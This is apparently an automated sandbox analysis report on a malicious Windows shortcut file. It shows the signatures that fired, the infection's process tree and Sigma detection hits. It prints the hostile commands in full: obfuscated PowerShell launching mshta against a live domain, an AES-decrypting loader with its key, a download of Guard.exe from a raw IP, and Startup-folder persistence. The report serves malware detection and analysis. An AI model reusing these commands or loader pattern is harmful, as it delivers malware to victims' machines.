Windows Analysis Report
duyba.lnk.download.lnk

Overview

General Information

Sample name: duyba.lnk.download.lnk
Analysis ID: 1577196
MD5: afc9a2ec3804784e238beba0fb861346
SHA1: fcf72ba6b5031b3cde13b6e09480f467bfcde1a0
SHA256: e3b166a6a0bb2f3041367773c47e195224a65e4bc6fb5b8e69a6e2309db055c3
Tags: lnk, tiffany-careers-com, user-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 5524 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 984 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 5060 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 4308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.Substring(0,3) $mGnVsuDWp.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 6392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 6408 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 4676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • PefjSkkhb.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
            • powershell.exe (PID: 7812 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7480 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 8004 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 7496 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4424 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 4720 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 4308
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x1804e2:$b1: ::WriteAllBytes(
  • 0x180c82:$b1: ::WriteAllBytes(
  • 0xc5ee9:$b3: ::UTF8.GetString(
  • 0xc6ab5:$b3: ::UTF8.GetString(
  • 0xc7885:$b3: ::UTF8.GetString(
  • 0xc90e5:$b3: ::UTF8.GetString(
  • 0xc9e1a:$b3: ::UTF8.GetString(
  • 0xcced8:$b3: ::UTF8.GetString(
  • 0xd0182:$b3: ::UTF8.GetString(
  • 0xd0d31:$b3: ::UTF8.GetString(
  • 0xd5d31:$b3: ::UTF8.GetString(
  • 0xddee5:$b3: ::UTF8.GetString(
  • 0xf0fe7:$b3: ::UTF8.GetString(
  • 0xf1b96:$b3: ::UTF8.GetString(
  • 0x13f25b:$b3: ::UTF8.GetString(
  • 0x13feb4:$b3: ::UTF8.GetString(
  • 0x140a80:$b3: ::UTF8.GetString(
  • 0x157a4d:$b3: ::UTF8.GetString(
  • 0x1585fc:$b3: ::UTF8.GetString(
  • 0x15a3c9:$b3: ::UTF8.GetString(
  • 0x15c3bb:$b3: ::UTF8.GetString(

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7480, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 8004, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7480, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 8004, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7496, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 984, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, ProcessId: 5060, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7480, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.S
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4424, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7812, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock($TmDJyn, 0,$TmDJyn.Length)); & $mGnVsuDWp.S
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 4720, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4308, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4424, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5524, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ProcessId: 984, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5300, ProcessName: svchost.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T09:13:05.458082+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 147.45.49.155 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1], ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ReversingLabs: Detection: 31%
Source: duyba.lnk.download.lnk, Virustotal: Detection: 20%
Source: duyba.lnk.download.lnk, ReversingLabs: Detection: 15%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.8% probability
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2270225640.000001D8EE742000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281480259.000001D8F2724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2731000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277177873.000001D8F2721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00007FF7C0ECC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED6428 FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7C0ED6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00007FF7C0EDA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92F50 FindFirstFileExW,11_2_00007FF7C0E92F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED71F4 FindFirstFileW,FindClose,11_2_00007FF7C0ED71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00007FF7C0ED72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECBC70
Source: C:\Users\Public\Guard.exeCode function: 20_2_00714005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00714005
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_0071494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD14 FindFirstFileW,FindClose,20_2_0071CD14
